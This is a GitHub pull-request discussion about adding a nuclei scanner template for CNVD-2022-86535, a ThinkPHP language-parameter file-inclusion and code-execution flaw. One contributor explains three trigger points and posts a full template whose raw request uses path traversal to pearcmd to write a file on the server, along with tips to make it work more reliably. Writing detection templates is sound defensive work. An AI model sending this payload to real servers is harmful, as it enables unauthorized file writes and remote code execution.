nuclei-templates icon indicating copy to clipboard operation
nuclei-templates copied to clipboard

Published 20 hours ago verified publisher icon projectdiscovery

CNVD-2022-86535

Open Armandhe-China opened this issue 2 years ago • 1 comments

Template / PR Information

  • Added CNVD-2022-86535
  • References: https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535

Template Validation

I've validated this template locally?

  • [x] YES
  • [ ] NO

Additional Details (leave it blank if not applicable)

Additional References:

Armandhe-China avatar Dec 21 '22 04:12 Armandhe-China

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2022/CVE-2022-47945.yaml

ViCrack avatar Apr 03 '23 04:04 ViCrack

应该是跟CVE-2022-47945重复了

两个模板不如整合成CVE-2022-47945

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-47945.yaml

ViCrack avatar Jun 19 '23 10:06 ViCrack

Hello there, @ViCrack, We are adding templates for all possible CVE and CNVD datasets, though I checked both templates, and the POC/exploit for both templates are slightly different. I also tried the CVE-2022-47945 template/POC on the CNVD-2022-86535 vulnerable docker instance, but it did not work.

ritikchaddha avatar Jun 19 '23 11:06 ritikchaddha

@ritikchaddha

My English is not good

CVE-2022-47945 CNVD-2022-86535 Actually, it's the same vulnerability that has already been duplicated. Just delete one of them This is an article written by the first original author to discover this vulnerability , https://tttang.com/archive/1865/

图片

CVE-2022-47945 is written inaccurately because it does not reflect the key point: /usr/local/php.pearcmd

There are at least three trigger points for vulnerabilities :

  1. ?lang=xxxxx
  2. think-lang: xxxx
  3. cookie: think_lang=xxxx

Among them, ?lang=xxxxx should be the most compatible and sufficient, as other triggering methods may not be effective in higher versions

For CNVD-2022-86535, of course, these three can also be merged into one to reduce HTTP requests, while removing unused safedog(), and it is best not to use {{rand_base(10)}}.log for writing files, but to use /tmp/{{rand_base(10)}}.log. instead, as the webroot directory may not have writable permissions

图片

This may be a bug in Nuclei, and the location of the URL get parameter has changed. Otherwise, the third data packet would have been successful

图片 图片

If the problem of parameter displacement in nuclei can be fixed, then the following template should be feasible

id: CNVD-2022-86535

info:
  name: Thinkphp Multi Languag- File Inc And RCE
  author: arliya,ritikchaddha
  severity: high
  description: |
    ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
  reference:
    - https://cn-sec.com/archives/1465289.html
    - https://blog.csdn.net/qq_60614981/article/details/128724640
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
  metadata:
    verified: true
  tags: cnvd,cnvd2022,thinkphp,rce

variables:
  content: "{{rand_base(5)}}"
  filename: "{{rand_base(10)}}"

http:
  - raw:
      - |
        GET /?lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/{{content}}+/tmp/{{filename}}.log HTTP/1.1
        Host: {{Hostname}}
        think-lang: ../../../../../../../../../../../usr/local/php/pearcmd
        Cookie: think_lang=../../../../../../../../../../../usr/local/lib/php/pearcmd

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CONFIGURATION"
          - "Successfully created"
          - "PEAR.PHP.NET"
          - "/tmp/{{filename}}"
        condition: and

图片

CVE-2022-47945和CNVD-2022-86535其实是同一个漏洞,重复了,删掉其中一个即可

这是第一个发现这个漏洞的原作者写的文章 https://tttang.com/archive/1865/

图片

CVE-2022-47945 写的不准确,因为没有体现到关键点:/usr/local/php/pearcmd

漏洞触发点至少有三处:

  1. ?lang=xxxxx
  2. think-lang: xxxx
  3. cookie: think_lang=xxxx

其中?lang=xxxxx应该是兼容性最好的,也足够了,其他的触发方法可能在高版本情况下无效

对于CNVD-2022-86535来说,当然也可以将这三个合并成一个,减少发包量,同时去掉没用的safedog(),并且写文件最好不要用{{rand_base(10)}}.log,而是用/tmp/xxxx,因为可能webroot目录没有可写权限 图片

这块可能是nuclei的bug,url get参数的位置发生了改变,不然第三个数据包其实是能成功的 图片 图片

ViCrack avatar Jun 19 '23 14:06 ViCrack

@ViCrack I agree that the CVE-2022-47945 template appears to be inaccurate and should be changed. In addition, as previously stated, we are adding/accepting templates for all possible CVE and CNVD datasets.

However, we are aware of the issue of shuffling the parameters when running the nuclei, which disrupts the payload execution.

ritikchaddha avatar Jun 19 '23 17:06 ritikchaddha

Hi @Armandhe-China Thank you so much for sharing this template with the community 🔥

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments.

DhiyaneshGeek avatar Jul 05 '23 06:07 DhiyaneshGeek